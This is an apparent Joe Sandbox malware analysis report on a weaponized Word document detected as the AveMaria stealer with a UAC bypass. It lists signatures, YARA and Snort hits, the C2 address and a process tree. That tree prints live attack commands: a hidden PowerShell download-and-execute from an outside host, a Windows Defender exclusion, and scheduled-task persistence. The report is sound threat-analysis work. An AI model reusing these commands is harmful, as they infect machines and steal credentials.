Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name:Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID:708250
MD5:9bc102ffb0930f5dee65bde8e0ba6d89
SHA1:37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256:959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags:doc
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Document contains OLE streams with names of living off the land binaries
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 956 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 264 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • explorer.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)
        • powershell.exe (PID: 2580 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2220 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • MSBuild.exe (PID: 568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
        • MSBuild.exe (PID: 2040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
    • powershell.exe (PID: 1312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2540 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • explorer.exe (PID: 676 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)
        • powershell.exe (PID: 2948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2172 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • MSBuild.exe (PID: 1228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
    • powershell.exe (PID: 2072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 904 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • explorer.exe (PID: 1248 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)
        • powershell.exe (PID: 1448 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2448 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • MSBuild.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
    • verclsid.exe (PID: 900 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2520 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup
{"C2 url": "20.126.95.155", "port": 7800}
SourceRuleDescriptionAuthorStrings
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.docINDICATOR_RTF_Exploit_Scriptingdetects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.ditekSHen
  • 0x8c12:$clsid2: 0003000000000000C000000000000046
  • 0x8370:$ole6: D0Cf11E
  • 0x7cd:$obj2: \objdata
  • 0x8325:$obj2: \objdata
  • 0x8311:$obj3: \objupdate
  • 0x828c:$obj4: \objemb
  • 0x9890:$obj4: \objemb
  • 0x827b:$obj6: \objlink
  • 0x8e0:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
SourceRuleDescriptionAuthorStrings
00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0xa8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xa8:$c1: Elevation:Administrator!new:
00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
    • 0x949:$s3: System.Net.WebClient).DownloadFile('httP
    00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        Click to see the 60 entries
        SourceRuleDescriptionAuthorStrings
        17.3.MSBuild.exe.6a5d90.1.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        17.3.MSBuild.exe.6a5d90.1.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xb18:$c1: Elevation:Administrator!new:
        17.3.MSBuild.exe.6a5d90.1.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
          29.2.explorer.exe.28d63b8.2.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x4c728:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          29.2.explorer.exe.28d63b8.2.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x4c728:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x4c728:$c1: Elevation:Administrator!new:
          Click to see the 122 entries

          Persistence and Installation Behavior

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\explorer.exe, ParentProcessId: 2360, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, ProcessId: 2220, ProcessName: schtasks.exe
          Timestamp:20.126.95.155192.168.2.227800491732852329 09/23/22-08:15:52.235686
          SID:2852329
          Source Port:7800
          Destination Port:49173
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:20.126.95.155192.168.2.227800491732852326 09/23/22-08:15:32.226881
          SID:2852326
          Source Port:7800
          Destination Port:49173
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2220.126.95.1554917378002852328 09/23/22-08:15:32.237815
          SID:2852328
          Source Port:49173
          Destination Port:7800
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:20.126.95.155192.168.2.227800491732036735 09/23/22-08:13:32.180190
          SID:2036735
          Source Port:7800
          Destination Port:49173
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2220.126.95.1554917378002036734 09/23/22-08:15:32.237815
          SID:2036734
          Source Port:49173
          Destination Port:7800
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2220.126.95.1554917378002852327 09/23/22-08:13:32.470320
          SID:2852327
          Source Port:49173
          Destination Port:7800
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.docReversingLabs: Detection: 32%
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.docVirustotal: Detection: 50%Perma Link
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\explorer.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exeJoe Sandbox ML: detected
          Source: 8.2.explorer.exe.3a2b638.11.unpackAvira: Label: TR/AD.MortyStealer.utbzg
          Source: 17.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
          Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

          Exploits

          barindex
          Source: Yara matchFile source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: explorer[1].exe.0.drJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
